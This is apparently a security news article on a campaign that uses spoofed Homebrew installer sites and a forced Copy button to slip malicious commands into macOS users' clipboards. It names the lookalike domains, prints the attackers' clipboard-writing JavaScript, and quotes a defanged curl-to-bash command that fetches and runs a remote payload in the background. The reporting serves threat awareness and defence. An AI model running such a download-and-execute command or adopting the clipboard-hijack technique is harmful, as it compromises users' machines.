A sophisticated campaign targeting macOS users has emerged through spoofed Homebrew installer websites that deliver malicious payloads alongside legitimate package manager installations.
The attack exploits the widespread trust users place in the popular Homebrew package manager by creating pixel-perfect replicas of the official brew[.]sh installation page, complete with deceptive clipboard manipulation techniques.
Security researchers have identified multiple fraudulent domains mimicking the legitimate Homebrew website, including homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.
These malicious sites present convincing replicas of the official installation interface but incorporate hidden JavaScript designed to inject additional commands into users’ clipboards without their knowledge.
Unlike authentic Homebrew pages that allow manual text selection, these spoofed versions force users to utilize a designated Copy button, enabling attackers to insert malicious payloads alongside standard installation commands.
.webp "Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads 2")
The campaign represents a significant evolution in supply chain attacks, targeting not the package repositories themselves but the initial installation process.
While Homebrew has maintained a strong security track record with no recent compromises, threat actors have discovered an effective workaround by impersonating the trusted installation source.
.webp "Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads 4")
The Sequence analysts identified this emerging threat pattern through systematic monitoring of suspicious domains and infrastructure associated with known malware distribution networks.
The attack methodology demonstrates remarkable sophistication in its execution and evasion capabilities.
Rather than compromising legitimate package repositories, attackers have developed a parallel infrastructure that intercepts users during the critical installation phase.
This approach bypasses traditional security measures focused on repository monitoring while exploiting the inherent trust users place in familiar installation procedures.
Advanced Clipboard Manipulation Techniques
The core infection mechanism relies on JavaScript-based clipboard manipulation that operates transparently to the victim.
When users click the Copy button on spoofed sites, embedded code executes a series of operations designed to inject malicious commands alongside the expected Homebrew installation script.
The JavaScript implementation includes Russian-language comments explicitly indicating where malicious commands should be inserted, suggesting a commodity-style threat service.
The malicious script prevents standard text selection through event listeners that disable contextmenu, selectstart, copy, cut, and dragstart operations on the installation block.
This forces victims to use the provided Copy button, which triggers the copyInstallCommand() function. The function writes a predetermined command to the clipboard using either the modern Clipboard API or fallback textarea methods for compatibility across different browser environments.
const copyCommand = 'echo '; // ← замени на нужную
async function copyInstallCommand () {
await navigator[.]clipboard[.]writeText (copyCommand);
fetch ('notify[.]php', {
method: 'POST',
headers: { 'Content-Type': 'application / json' },
body: JSON[.]stringify ({ event: 'copy_install_command', time: new Date () })
});
}Analysis revealed that active campaigns utilize commands such as curl - s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes additional payloads in the background while the legitimate Homebrew installation proceeds normally, creating an effective dual-execution scenario that maintains operational stealth while establishing persistent access to compromised systems.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
